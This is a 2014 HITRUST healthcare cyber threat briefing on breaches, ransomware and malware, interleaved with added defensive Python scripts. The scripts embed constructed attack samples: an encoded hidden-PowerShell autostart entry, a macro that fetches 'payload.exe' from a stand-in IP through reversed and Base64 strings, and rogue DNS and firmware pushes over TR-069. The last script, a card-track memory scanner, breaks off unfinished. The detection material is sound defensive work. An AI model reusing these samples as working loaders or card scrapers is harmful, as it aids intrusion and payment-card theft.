HITRUST Cyber Threat Intelligence and Incident Coordination Center (C3) Month in Review Cyber Threat Briefing For August 2014 September 18, 2014
Page 1: HITRUST Cyber Threat Intelligence and Incident ...hitrustalliance.net/content/uploads/2014/09/HITRUST-Monthly-Cyber... · • Cyber-Espionage Campaign Targets Norwegian Oil Companies

HITRUST Cyber Threat Intelligence and

Incident Coordination Center (C3)

Month in Review Cyber Threat Briefing

For August 2014

September 18, 2014

Page 2

• Purpose

• Emerging Threats

• Monthly Production

• Threat Updates

• Calendar

• Discussion

Agenda

© 2014 HITRUST, Frisco, TX. All Rights Reserved. Written permission required for further distribution.

For more information visit www.hitrustalliance.net/c3

Page 3

• The purpose of the HITRUST Month in Review Cyber Threat Briefing is to disseminate meaningful and, when possible, actionable information pertaining to cyber threats and incidents relevant to healthcare organizations

• It aims to provide insights into known threats and compensating controls and strategies

• In addition, the following briefings are produced:

– HITRUST Strategic Cyber Threat Briefing (prospective)

– HITRUST Crisis Specific Cyber Threat Briefing (incident specific)

Purpose


Page 4

Federal Healthcare Website Breached, Malware Installed

• Federal officials from the Department of Health and Human Services (DHHS) announced that a malicious actor gained access to a server connected to the healthcare[.]gov website and installed malware

• Breached server was designed for testing code for the healthcare[.]gov website

– Did not store any personally identifiable information (PII) or protected health information (PHI)

• Server had low security settings because it was never intended to be connected to the Internet

– The server was accessible using a default password

• Reports claimed that the attacker uploaded malware designed to conduct distributed denial of service (DDoS) attacks

• Cyber4Sight analysts assess that despite government statements to the contrary, the malicious actor may have intentionally targeted the test server for incorporation into a botnet because of its association with a government-operated website.


Page 5

Home Depot Breach Confirmed

• On 2 September, a large volume of stolen credit card information was posted for sale on the popular underground cybercriminal forum rescator[.]cc

– Based on the initial advertisement, the card data is rated 100 percent valid and includes state and ZIP code information in addition to the basic card data. Early investigation into the stolen card information suggests that Home Depot stores may be the source of the compromise.

• 3 September: analysis suggests nearly all Home Depot store locations in the U.S. may have been affected

• 7 September: sources close to the investigation of the alleged breach claimed the attack was carried out with the aid of a variant of BlackPOS, the malware used against Target’s POS devices

• 8 September: Home Depot confirmed that its payment systems had been breached but specifically stated that no debit card PINs had been compromised. Various banking institutions are nevertheless seeing an increase in fraudulent ATM withdrawals, possibly because criminals are changing the PINs on affected cards; the weak authentication in the automated phone systems many banks use for PIN changes makes this possible


Page 6

Monthly Production

Bold titles are highlighted in this briefing

• African Cybercriminals Targeting Dubai-Based Individuals With Kidney-Purchasing Scam

• Animal Rights Hacktivist Claims to Disrupt Major Chinese Corporate and Government Sites

• AnonGhost Announces Upcoming Anti-Israel Hacktivist Campaign

• Arab Hacktivist Announces Campaigns Targeting Jordan and Saudi Arabia

• Arab Hacktivist Claims to Attack UAE Targets as Part of OpArabia

• Arab Hacktivist Targets Israeli Financial Institutions as Part of OpSaveGaza Campaign

• ATM-Skimming Operations Discovered in Kuwait and the UAE

• Backdoor-Creating Malware Hides Code in Windows Registry, Evading File-Based Antivirus Software

• Black Hat Presentation Surveys Automobile Attack Surfaces

• Boletos Malware Using TTPs Similar to Those of GameOver ZeuS

• Carbon Grabber Malware Targets the Automotive Industry

• China Announces Domestic Operating System in Latest IT-Domestication Move

• China Removes Security Firms, Including Symantec and Kaspersky, From Procurement Whitelist

• Chinese Authorities Arrest Cybercriminals Responsible For Android-Based Campaign

• Chinese Government Restricts Foreign and Domestic Mobile Chat Apps

• Community Health Systems Suffers Massive Data Breach, Chinese Cybercriminal Group Suspected

• Critical Vulnerabilities Identified in Common Mobile Applications

• Cyber-Espionage Campaign Targets Norwegian Oil Companies

• DHS Advisory Warns of Major Point-of-Sale Campaign Affecting U.S. Companies

• EU to Consider Banning Russia From the SWIFT Banking Transaction System, Potential for Cyber Retaliation

• Finnish Company Suffers Database Breach; PII From Eight Companies Accessed

• FlashPack Exploit Kit Leverages Malicious Social Media Add-On For Websites

• Hacking Group Resumes DDoS Attacks Against Gaming Sites

• Hacktivist Group Claims Attack Against Syrian Stock Exchange, Seeks Military Action Against ISIS

• Hacktivists Announce and Discuss Saudi Hacktivist’s Alleged Death

• Hilf-ol-Fozoul Discusses Alleged Attack on Saudi Stock Exchange

• Hilf-ol-Fozoul Reaches Out to Hacktivist Groups on Twitter

• Indian Government Warns About Potential Cyber Attacks to Coincide With Independence Day

• Iranian Civil and Defense Organizations Form Joint Cyber Working Group

• Israeli Security Official Alleges Large-Scale Iranian Cyber Attacks

• Japanese DDoS Attack Via Home Routers Affects 4.8 Million Households

• Japanese Government to Mitigate Supply-Chain Risk in Connected Devices

• KiberBerkut Claims Attacks on Websites of the President of Poland and the Warsaw Stock Exchange

• KiberBerkut Defaces Multiple Ukraine-based Websites

• Libyan Hacktivist Reportedly Attacks Saudi Television Station

• Malaysia Authorities Report MH370 Crash-Investigation Documents Targeted in Cyber Attack

• Malicious Macros in Microsoft Office Files Re-Emerge Using New Obfuscation Techniques

• Malware Linked to North Korea Reemerges Ahead of U.S.-ROK Joint Military Exercise

• Media Source Claims Ukrainian Government Is Primary Target of Russian Epic Turla Campaign

• NetTraveler Chinese APT Variant Observed in Targeted Attacks on Uyghurs and Tibetans

• NHTSA Initiates Public Vehicle-to-Vehicle Communications Discussion


Page 7

Monthly Production (continued)

• North Korean APT Actors Targeted the Japanese Government Ahead Of Negotiations

• NTP Denial of Service Vulnerabilities Disclosed

• Onsite Health Diagnostics Linked to Another Data Breach

• Onsite Health Diagnostics Linked to Third Healthcare Entity Breach

• Pakistani and Indian Hacktivists Conduct Cross-Border Attacks Coinciding With National Holidays

• Possible New APT Campaign “El Machete” Identified Targeting Latin American Countries

• Proof-of-Concept Demonstrates Potential Malware Obfuscation Method

• Remote Access Trojan Targets Android Mobile Phone Users in Poland

• Report Highlights the TTPs of a Chinese APT Targeting Uyghur Minority Groups

• Report on Anti-Israel DDoS Attacks Released

• Report on Syria-Based Malware Attacks Released

• Researchers Identify Code-Manipulation Technique to Bypass Software-Defense Mechanisms

• RIG Exploit Kit Spreads Credential-Stealing Malware in South Korea

• Russia Enacts Blog and Online-Media Law

• Russian Government to Require Users to Provide Personal Information to Access Public WiFi

• Saudi Hacktivist Claims to Attack Government Websites in the UAE and Saudi Arabia

• Saudi Hacktivist Resumes Activity Following Reported Death

• Security Firm Reveals Emergence of New Syrian Cyberthreat Group

• Security Researchers Demonstrate Breach of Traffic-Light System

• Security Researchers Propose a Vehicle Cybersecurity Program

• Side-Channel Cryptography Attacks Demonstrated on New SSL/TLS Implementations

• Singapore Government to Improve Cybersecurity Capabilities in Wake of Several Attacks

• Sony PlayStation Network Disrupted by DDoS Attacks

• South Korean Cybercriminal Gang Arrested For Distributing Chinese-Made Pharming Malware

• South Korean Cybercriminals Distribute Malware Developed by North Korean Hackers

• South Korean Cybercriminals Leverage Stolen PII to Target Virtual Credits

• South Korean Defense Correspondents’ Laptops Targeted in Spear-Phishing Campaign

• South Korean Government Incentivizes Cybersecurity in the Private Sector

• Suspected Iranian Hacktivist Group Claims to Leak Information from Israeli Employment-Search Website

• Suspected Nation-State Actors Breach U.S. Government Contractor to Access Personnel Records

• SynoLocker Ransomware Used In Attack Against Chinese University of Hong Kong Medical Department

• Tennessee Government Employee PII Stolen in Breach of Third-Party Healthcare Vendor

• U.S. Nuclear Regulator Suffers Multiple Cyber Attacks Over Past 3 Years

• U.S. Supermarket Chains’ Shared POS System Breached

• UPDATE: Arab Hacktivist Claims to Attack UAE Targets as Part of OpArabia

• UPDATE: Canada’s National Research Council Targeted in Cyber-Espionage Campaign Attributed to China

• UPDATE: Chinese Cybercriminal Arrested For Hacking U.S. Aviation Defense Contractors

• UPDATE: Cyber-Espionage Campaign Targets Norwegian Oil Companies

• UPDATE: FlashPack Exploit Kit Leverages Malicious Social Media Add-On For Websites

• UPDATE: Indian CERT Issues Warning Over Fraudulent Certificates

• UPDATE: SynoLocker Ransomware Used In Attack Against Chinese University of Hong Kong Medical Department


Page 8

Monthly Production (continued)

• UPS Store Franchises Suffer POS Malware Compromise

• Vehicle-Door Hack To Be Demonstrated

• Versatility of Popular Cybercriminal Exploit Kit Revealed

• Vulnerabilities Discovered in Wearable Health Technology and Associated Mobile Applications

• Vulnerabilities Identified in Auto-Configuration Servers

• Vulnerabilities in Aviation Satellite Communication Devices Revealed

• Vulnerabilities in Nest Thermostat Could Allow Attackers to Compromise Local Network


Page 9

Threat Updates

• Vulnerabilities Discovered in Wearable Health Technology and Associated Mobile Applications

• Backdoor-Creating Malware Hides Code in Windows Registry, Evading File-Based Antivirus Software

• SynoLocker Ransomware Used In Attack Against Chinese University of Hong Kong Medical Department

• Malicious Macros in Microsoft Office Files Re-Emerge Using New Obfuscation Techniques

• Suspected Nation-State Actors Breach U.S. Government Contractor to Access Personnel Records

• African Cybercriminals Targeting Dubai-Based Individuals With Kidney-Purchasing Scam

• UPDATE: SynoLocker Ransomware Used In Attack Against Chinese University of Hong Kong Medical Department

• Vulnerabilities Identified in Auto-Configuration Servers

• U.S. Supermarket Chains’ Shared POS System Breached

• Community Health Systems Suffers Massive Data Breach, Chinese Cybercriminal Group Suspected

• Onsite Health Diagnostics Linked to Third Healthcare Entity Breach

• UPS Store Franchises Suffer POS Malware Compromise

• Critical Vulnerabilities Identified in Common Mobile Applications

• Onsite Health Diagnostics Linked to Another Data Breach


Page 10

Vulnerabilities Discovered in Wearable Health Technology and Associated Mobile Applications

• Many wearable health devices—and their associated mobile apps—do not adequately protect user information

• Researchers claim that the devices—including smartphones—collect comprehensive amounts of data, raising security and privacy concerns, given that they are both generating and transmitting personal data as well as storing it either on other devices or in the cloud

• Researchers found the following vulnerabilities:

– All wearable activity-tracking devices can be traced through their wireless protocol transmissions, which divulge the device’s unique hardware address.

– Devices may allow remote querying, which would allow malicious actors to discover the serial number and other unique characteristics of the wearable device

• After examining an unspecified number of mobile health (mHealth) apps, researchers found that 20 percent of them transmit physical-activity information and personally identifiable information (PII) to cloud-based accounts

• Cyber4Sight analysts assess that cybercriminals will likely target mHealth devices and associated web-based services to acquire PHI and PII, given their increasing popularity.


Page 11

Backdoor-Creating Malware Hides Code in Windows Registry, Evading File-Based Antivirus Software

• “Poweliks” is malware that hides its code in the Windows Registry (the database of configuration settings on Windows), making detection difficult for file-based antivirus software

• Poweliks is deployed using a malicious Microsoft Word document exploiting the CVE-2012-0158 vulnerability, spread via phishing email messages

– Also observed being distributed via drive-by download attacks

– Creates an encoded Autostart registry entry whose name is either blank or NULL, so that it remains invisible to the user

– Checks whether Windows PowerShell (Microsoft’s command-line shell for task automation and configuration management) is installed on the infected system; if it is not, Poweliks installs it

– A Base64-encoded script calls and executes code in Windows PowerShell, which in the case analyzed by G Data tried to connect to hard-coded IP addresses to receive further commands

• Cyber4Sight assesses that the Poweliks malware may have been recently deployed by established cybercriminals as a proof-of-concept prototype in an attempt to test the malware’s anti-detection functionality before deploying it in large-scale campaigns.
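The two traits above are what a file-less hunt has to look for on the registry side. The script below is an added example (it is not code from the briefing or from G Data’s analysis): it parses a .reg export of the Run keys, flags any value whose name is blank or not displayable, and flags and decodes any value whose data starts PowerShell with a Base64-encoded script (PowerShell’s -EncodedCommand takes Base64 of UTF-16LE text). The .reg text, the zero-width-space value name and the decoded stand-in script are constructed for the example.

```python
"""Triage a Windows .reg export for registry-resident autostart entries.

Added example, not code from the HITRUST briefing or from G Data. It flags
an autostart value whose name is blank or not displayable, and value data
that starts PowerShell with a Base64-encoded (UTF-16LE) script, which it
decodes. The .reg text is constructed; the decoded script is a stand-in.
"""
import base64
import re

RUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
}
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENC_SWITCH = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

# Stand-in for the second stage; a real sample contacts hard-coded IP addresses here.
STAND_IN_SCRIPT = "Write-Output 'stand-in for the stage that called 198.51.100.7'"
ENCODED = base64.b64encode(STAND_IN_SCRIPT.encode("utf-16-le")).decode()


def reg_hex2(s: str) -> str:
    """Encode a string the way .reg files store REG_EXPAND_SZ: hex(2): of UTF-16LE bytes."""
    return "hex(2):" + ",".join(f"{b:02x}" for b in (s + "\0").encode("utf-16-le"))


# Constructed export: one benign entry, one blank-named (default value) entry that
# launches an encoded script, one entry whose name is a zero-width space (U+200B).
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"',
    f'@="powershell.exe -WindowStyle Hidden -NoProfile -enc {ENCODED}"',
    '"\u200b"=' + reg_hex2(f"%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ec {ENCODED}"),
])


def unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)      # .reg escapes backslash and double quote


def parse_reg_export(text: str):
    """Yield (key, value_name, value_data) for every REG_SZ / REG_EXPAND_SZ value."""
    text = re.sub(r",\\\r?\n\s*", ",", text)   # re-join hex(...) lines wrapped with a trailing backslash
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_LINE.match(line) if key else None
        if not m:
            continue
        raw_name, raw_data = m.groups()
        name = "" if raw_name == "@" else unescape(raw_name[1:-1])
        if raw_data.startswith('"') and raw_data.endswith('"'):
            data = unescape(raw_data[1:-1])
        elif raw_data.lower().startswith("hex(2):"):
            raw = bytes(int(h, 16) for h in raw_data[7:].split(",") if h)
            data = raw.decode("utf-16-le", errors="replace").rstrip("\0")
        else:
            continue                            # DWORD / binary values are not of interest here
        yield key, name, data


def decode_encoded_command(data: str):
    """Recover the script behind powershell -EncodedCommand, or None."""
    m = ENC_SWITCH.search(data)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_name(name: str) -> bool:
    """Blank, control or non-ASCII value names are what regedit cannot show the user."""
    return name == "" or not name.isprintable() or not name.isascii()


def triage(reg_text: str) -> list:
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if key.lower() not in RUN_KEYS:
            continue
        reasons = []
        if suspicious_name(name):
            reasons.append("blank or non-displayable value name")
        script = decode_encoded_command(data)
        if script is not None:
            reasons.append("starts PowerShell with a Base64-encoded script")
        if reasons:
            findings.append({"key": key, "name": name, "data": data,
                             "script": script, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REG):
        print(repr(f["name"]), "|", "; ".join(f["reasons"]))
        if f["script"]:
            print("   decoded:", f["script"])
```

Collect the export on the suspect host with `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (it is written as UTF-16LE, so read it with that encoding) and pass the text to `triage()`. The name check is the more durable of the two: an autostart value regedit cannot display is worth a look whatever it launches, while the PowerShell check only covers the loader shape described above.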


Page 12

SynoLocker Ransomware Used In Attack Against Chinese University of Hong Kong Medical Department

• Storage servers of the Faculty of Medicine’s Center for Liver Health and Institute for Digestive Disease, which contain patient records, were infected with SynoLocker ransomware

• SynoLocker

– Specifically targets Synology’s Network Attached Storage (NAS) devices

– Encrypts victims’ data and demands payment, much like CryptoLocker

• 10,000 individual patient records were affected

• Patient data was encrypted, but no evidence was found that it was taken

• The vulnerability is tied to factory settings for passwords and port configurations that allow users to configure newly purchased devices

• Current patches issued by Synology may not fully patch the vulnerability

• SynoLocker will likely become more prevalent

• Default-password and administrative-settings vulnerabilities are relatively easy to discover and difficult to fix, since fixing them requires user action


Page 13

Malicious Macros in Microsoft Office Files Re-Emerge Using New Obfuscation Techniques

• Malicious macros (scripts embedded in documents and executed by the application that opens them) in Microsoft Office documents “have recently experienced a revival.”

• Two recent examples found:

– A Microsoft Excel file with malicious embedded macros that are not detected by standard Office security tools

• The macros are obfuscated with Base64 encoding, which represents arbitrary bytes as ASCII text; it hides nothing from anyone who decodes it, but it defeats simple string signatures

– A Word file containing a fake AeroMexico ticket; the macros are not encoded, but the URLs are written backwards in the code in an attempt to evade signature-based detection

• Cyber4Sight assesses that the re-emergence of malicious macros as a delivery method (in 1999–2000 the most prevalent one, but in steep decline thereafter) is likely to succeed primarily at infecting users in regions where outdated or pirated Microsoft Office software is prevalent, such as Latin America.
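Both tricks above are cheap to undo once the VBA source is extracted. As an added example (not code from the briefing), the script below recovers indicators from macro source that uses them: it re-joins string literals chopped up with `&`, reverses literals that read as URLs backwards, and decodes literals shaped like Base64. The macro text is constructed, with a reversed download URL and a Base64 literal split across two lines; the hosts are documentation addresses.

```python
"""Extract indicators from obfuscated VBA macro source.

Added example, not code from the HITRUST briefing. It undoes the two tricks
the slide describes, Base64-encoded strings and URLs written backwards (which
the macro unwinds at run time with StrReverse), and re-joins literals that
were split with "&" so that a signature never sees the whole string.
The macro text is constructed; the hosts are documentation addresses.
"""
import base64
import re

STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')   # VBA doubles a quote to embed one
SPLIT_LITERAL = re.compile(r'"\s*&\s*_?\s*"')      # "abc" & _ <newline> "def" -> "abcdef"
URL = re.compile(r"^(?:https?|ftp)://[\w.-]+(?::\d+)?(?:/\S*)?$", re.I)
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

PAYLOAD_URL = "http://198.51.100.7/payload.exe"
_b64 = base64.b64encode(PAYLOAD_URL.encode()).decode()

# Constructed macro in the style of the fake-ticket lure: one URL stored backwards,
# one stored as Base64 and split across a line continuation.
SAMPLE_MACRO = f"""
Private Sub Document_Open()
    ' constructed sample, not a real lure
    Dim r As String, b As String
    r = StrReverse("exe.etadpu/7.001.15.891//:ptth")
    b = "{_b64[:20]}" & _
        "{_b64[20:]}"
    Call Fetch(r, DecodeBase64(b))
End Sub
"""


def literals(src: str) -> list:
    """All string literals in the source, with split literals joined first."""
    joined = SPLIT_LITERAL.sub("", src)
    return [m.group(1).replace('""', '"') for m in STRING_LITERAL.finditer(joined)]


def decode_base64(s: str):
    """Decode s if it is shaped like Base64 and yields printable text; else None."""
    if not B64_SHAPE.match(s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def analyze(src: str) -> dict:
    """Return StrReverse usage and every literal that yields an indicator."""
    iocs = []   # (technique, literal as written, recovered value)
    for lit in literals(src):
        if URL.match(lit):
            iocs.append(("plain", lit, lit))
        elif URL.match(lit[::-1]):
            iocs.append(("reversed", lit, lit[::-1]))
        else:
            decoded = decode_base64(lit)
            if decoded is not None:
                iocs.append(("base64", lit, decoded))
    return {
        "strreverse_calls": len(re.findall(r"\bStrReverse\s*\(", src, re.I)),
        "iocs": iocs,
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_MACRO)
    print("StrReverse calls:", result["strreverse_calls"])
    for technique, literal, recovered in result["iocs"]:
        print(f"{technique:9} {literal!r} -> {recovered}")
```

Extract the VBA first (olevba from oletools, or the VBA editor) and feed the text to `analyze()`. The reversed-URL check does not depend on seeing a `StrReverse` call, so it also catches macros that reverse strings with their own loop; the Base64 check only reports decodes that are printable text, which keeps binary blobs and random-looking keys out of the output.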


Page 14

Suspected Nation-State Actors Breach U.S. Government Contractor to Access Personnel Records

• U.S. Investigations Services (USIS) announced that its networks were breached in an attack that potentially compromised Department of Homeland Security (DHS) employee information

• USIS conducts background investigations on behalf of U.S. government agencies for the purpose of granting security clearances.

• Attack likely conducted by nation-state threat actors

• Breach probably resulted in the theft of DHS employee information

• Cyber4Sight analysts concur that the attack was probably carried out by nation-state actors; however, contrary to the unnamed DHS officials’ statement, Cyber4Sight assesses that the targeting similarities suggest that a China-based group was possibly responsible.


Page 15

African Cybercriminals Targeting Dubai-Based Individuals With Kidney-Purchasing Scam

• African cybercriminals recently conducted a phishing campaign against individuals in Dubai in an effort to obtain their personally identifiable information (PII) and banking credentials

• Dubai-based individuals are sent phishing email messages offering to buy human kidneys for up to USD 130,000

– Promising an initial payment of USD 80,000 before the surgery and the remainder following the procedure

• The phishing messages requested numerous PII, including age, gender, date of birth, telephone numbers, parents’ names, employment status and information, monthly income amount, relationship status, blood type, and physical address

• Cyber4Sight analysts assess that the evolution of other 419-scam perpetrators suggests that individuals in the UAE could be future targets of similar medical-themed campaigns employing more advanced tools such as a commercially available remote access trojan (RAT).


Page 16

UPDATE: SynoLocker Ransomware Used In Attack Against Chinese University of Hong Kong Medical Department

• The SynoLocker ransomware attack was part of a larger campaign that also compromised four major Internet service providers (ISPs) in Hong Kong

• 14 servers were encrypted by SynoLocker attacks at PCCW, Netvigator, Hong Kong Broadband Network (HKBN), and Hutchison Global Communications

• SynoLocker specifically targets Network Attached Storage (NAS) devices made by Taiwan-based data-storage provider Synology

– Encrypts victims’ data and demands payment, similar to the CryptoLocker ransomware

• Four ISPs confirmed the breaches and each affirmed that there was no indication that their networks or subscriber data had been compromised

• Cyber4Sight assesses it to be unlikely that SynoLocker could automatically spread via ISPs directly to users, based on its architecture and attack vector.


Page 17

Vulnerabilities Identified in Auto-Configuration Servers

• Several vulnerabilities were identified in the software and configuration settings of auto-configuration servers (ACS), which Internet service providers (ISPs) use to provide remote technical support on customers’ Internet routing devices

• Several ACS software packages are susceptible to remote code execution

• If compromised, an ACS may provide an attacker with:

– Full access to the capabilities and reach of the TR-069 protocol—namely, access to sensitive data from customers’ routing devices, including usernames, hostnames, and MAC addresses

– The capability to change default domain name servers

– The ability to download or upload configuration data and firmware

• Cyber4Sight assesses that this disclosure will almost certainly lead to the increased scanning for, and if possible the probing of, known ACSs. However, increased scanning and probing alone will likely not constitute a significant threat to ACSs in general.
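The three capabilities listed above all arrive at the customer device as ordinary TR-069 (CWMP) RPCs, so a compromised ACS looks to the router exactly like its legitimate one. As an added example (not code from the briefing or from any ACS or CPE vendor), the script below parses the two ACS-to-CPE RPCs those capabilities map to, SetParameterValues (here changing the DNS servers the gateway hands to LAN hosts) and Download (a firmware image), and checks them against a local policy of the kind a CPE or a monitoring tap could enforce. The SOAP messages, the resolver allow-list and the trusted firmware host are constructed or assumed for the example; parameter names follow the TR-098 InternetGatewayDevice data model.

```python
"""Policy check on ACS-to-CPE TR-069 (CWMP) requests.

Added example, not code from the HITRUST briefing or from any ACS/CPE vendor.
It parses SetParameterValues and Download RPCs from a CWMP SOAP envelope and
reports what a CPE should refuse: resolvers outside the ISP's allow-list,
firmware from an untrusted host or over plain HTTP, and (an assumption that
generalizes the slide) a change of the ACS URL itself. All messages and the
policy values below are constructed for the example.
"""
from urllib.parse import urlparse
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
CWMP = "urn:dslforum-org:cwmp-1-0"
NS = {"soap": SOAP, "cwmp": CWMP}

# Assumed policy: the ISP's own resolvers and the only host firmware may come from.
ALLOWED_DNS = {"203.0.113.53", "203.0.113.54"}
TRUSTED_FIRMWARE_HOST = "fw.isp.example"


def envelope(rpc_xml: str) -> str:
    """Wrap one RPC in a CWMP SOAP envelope (constructed sample traffic)."""
    return (f'<soap:Envelope xmlns:soap="{SOAP}" xmlns:cwmp="{CWMP}">'
            f'<soap:Header><cwmp:ID soap:mustUnderstand="1">1</cwmp:ID></soap:Header>'
            f'<soap:Body>{rpc_xml}</soap:Body></soap:Envelope>')


# An ACS pushing a rogue resolver alongside one of the ISP's own.
SAMPLE_SET = envelope(
    "<cwmp:SetParameterValues><ParameterList>"
    "<ParameterValueStruct>"
    "<Name>InternetGatewayDevice.LANDevice.1.LANHostConfigManagement.DNSServers</Name>"
    "<Value>198.51.100.9,203.0.113.53</Value></ParameterValueStruct>"
    "<ParameterValueStruct>"
    "<Name>InternetGatewayDevice.ManagementServer.PeriodicInformInterval</Name>"
    "<Value>300</Value></ParameterValueStruct>"
    "</ParameterList><ParameterKey>k1</ParameterKey></cwmp:SetParameterValues>")

# An ACS telling the CPE to fetch a firmware image over plain HTTP from an unknown host.
SAMPLE_DOWNLOAD = envelope(
    "<cwmp:Download><CommandKey>fw1</CommandKey>"
    "<FileType>1 Firmware Upgrade Image</FileType>"
    "<URL>http://198.51.100.9/fw/gateway.bin</URL>"
    "<Username></Username><Password></Password><FileSize>0</FileSize>"
    "<TargetFileName></TargetFileName><DelaySeconds>0</DelaySeconds>"
    "<SuccessURL></SuccessURL><FailureURL></FailureURL></cwmp:Download>")


def parse_rpc(xml_text: str):
    """Return (rpc_name, arguments) for the single RPC carried in a CWMP envelope."""
    body = ET.fromstring(xml_text).find("soap:Body", NS)
    rpc = body[0]
    name = rpc.tag.split("}", 1)[1]            # strip the cwmp namespace
    if name == "SetParameterValues":
        args = {p.findtext("Name"): p.findtext("Value", default="")
                for p in rpc.iter("ParameterValueStruct")}
    else:                                      # Download and the rest use flat arguments
        args = {child.tag: (child.text or "") for child in rpc}
    return name, args


def check_rpc(xml_text: str) -> list:
    """Policy violations a CPE (or a tap in front of it) should refuse or alert on."""
    name, args = parse_rpc(xml_text)
    problems = []
    if name == "SetParameterValues":
        for param, value in args.items():
            if param.endswith(".DNSServers"):
                rogue = {s.strip() for s in value.split(",")} - ALLOWED_DNS
                if rogue:
                    problems.append(f"{param} -> non-allow-listed resolver(s) {sorted(rogue)}")
            # Repointing the CPE at another ACS hands it to whoever runs that ACS
            # (assumed policy; the slide does not discuss this parameter).
            if param.endswith("ManagementServer.URL"):
                problems.append(f"{param} changed to {value}")
    elif name == "Download":
        url = urlparse(args.get("URL", ""))
        if url.scheme != "https":
            problems.append(f"Download over {url.scheme or 'no'} scheme, not https")
        if url.hostname != TRUSTED_FIRMWARE_HOST:
            problems.append(f"Download from untrusted host {url.hostname}")
    return problems


if __name__ == "__main__":
    for sample in (SAMPLE_SET, SAMPLE_DOWNLOAD):
        rpc_name, _ = parse_rpc(sample)
        print(rpc_name, check_rpc(sample))
```

The point of the DNS rule is that the value arrives as a comma-separated list, so an attacker can leave the ISP resolver in place and still win by putting a rogue one first; the check therefore rejects any address outside the allow-list rather than requiring the whole list to be rogue. Firmware provenance is the harder problem, since TR-069 itself carries no signature for the image: a host and transport check like the one here only raises the bar until the CPE verifies a vendor signature on the file.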


Page 18

U.S. Supermarket Chains’ Shared POS System Breached

• Minnesota-based Supervalu announced that its payment-processing network had been compromised by unknown cybercriminal actors from approximately 22 June to 17 July

• Breach may have led to the exfiltration of customers’ names, payment card numbers, and expiration dates at 180 Supervalu-owned stores

– Supervalu also provides payment-processing technology services to nearly 1,000 stores formerly owned by Supervalu

• Cyber4Sight analysts assess that Supervalu’s systems were likely targeted by cybercriminal actors because of the large number of non-Supervalu-owned grocery-store chains that also relied on its payment-processing services, vastly increasing the total number of potentially compromised payment cards.


Page 19

Community Health Systems Suffers Massive Data Breach, Chinese Cybercriminal Group Suspected

• U.S.-based Community Health Systems (CHS) filed a report with the SEC alleging that hackers stole the personally identifiable information (PII) of 4.5 million patients

– The hackers stole the full names, addresses, dates of birth, telephone numbers, and social security numbers

• CHS states that the breach “did not include patients’ credit card, medical, or clinical information”

• The attackers were allegedly a China-based advanced persistent threat (APT) group previously associated with intellectual-property theft

• A Mandiant researcher claims it was APT18

• TrustedSec’s sources claim the attackers exploited CVE-2014-0160, the OpenSSL “Heartbleed” vulnerability

• Cyber4Sight assesses that it is plausible CHS was targeted by a China-based APT group, even though the theft of PII is not typically associated with Chinese APT groups.

– The SEC filing claims that the stolen data was “non-medical patient identification data related to [CHS’s] physician practice operations,” which could be of interest to Chinese healthcare organizations


Page 20

Onsite Health Diagnostics Linked to Third Healthcare Entity Breach

• Data breach discovered in an online appointment-scheduling application for a Kansas City Children’s Mercy Hospital (CMH) employee wellness program

• The stolen data was stored by Onsite Health Diagnostics (OHD), a vendor used by the program’s administrator, StayWell Health Management (StayWell)

• The breach included names, home addresses, email addresses, phone numbers, and dates of birth

– StayWell alleged that no financial and health information or social security numbers were included in the breach

• OHD has been implicated in at least two other known breaches of personally identifiable information (PII) from healthcare organizations in the last few months

• Cyber4Sight assesses that these three breaches may have been carried out by the same cybercriminal actor or group, due to their common use of OHD’s systems as a point of entry and similar type of stolen PII.


Page 21

UPS Store Franchises Suffer POS Malware Compromise

• United Parcel Service (UPS) has announced that 51 of its store locations in 24 states were breached by cybercriminals who used point-of-sale (POS) malware

• Cybercriminals stole customer financial information, including names, payment card numbers, mailing addresses, and email addresses

• UPS reports that the intrusions began on 20 January and ended on 11 August, when UPS removed the malware

• Based on UPS’s investigation and the content of US-CERT’s alert, it is plausible that this malware was a variant of the “Backoff” malware

– Backoff scrapes compromised systems’ memory, logs keystrokes, and sends the data it collects back to a command-and-control (C2) server

• Cyber4Sight assesses that this UPS Store compromise may have been carried out by a single cybercriminal group that systematically carried out waves of attacks on UPS Store locations, exploiting vulnerabilities in a particular POS system used by many UPS Store franchise owners.
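“Scrapes compromised systems’ memory” means, concretely, that the malware reads the payment application’s process memory and pattern-matches magnetic-stripe track data before it is encrypted. The following is an added example (it is not Backoff’s code and not from the briefing): a scanner that finds Track 1 and Track 2 data in a memory image the way a RAM scraper does, with a Luhn check to discard digit runs that are not card numbers. For a defender it answers the question a scraper relies on, namely whether track data sits in cleartext in a dump of the POS process or of a suspect host’s RAM. The buffer is constructed and the PAN is the standard 4111 test number.

```python
"""Scan a memory image for magnetic-stripe track data, as a POS RAM scraper does.

Added example, not Backoff's code and not from the HITRUST briefing. Run it over
a dump of the payment application's process to confirm whether Track 1/Track 2
data sits in cleartext, which is the condition a scraper needs. The buffer is
constructed; the PAN is the standard 4111... test number.
"""
import re

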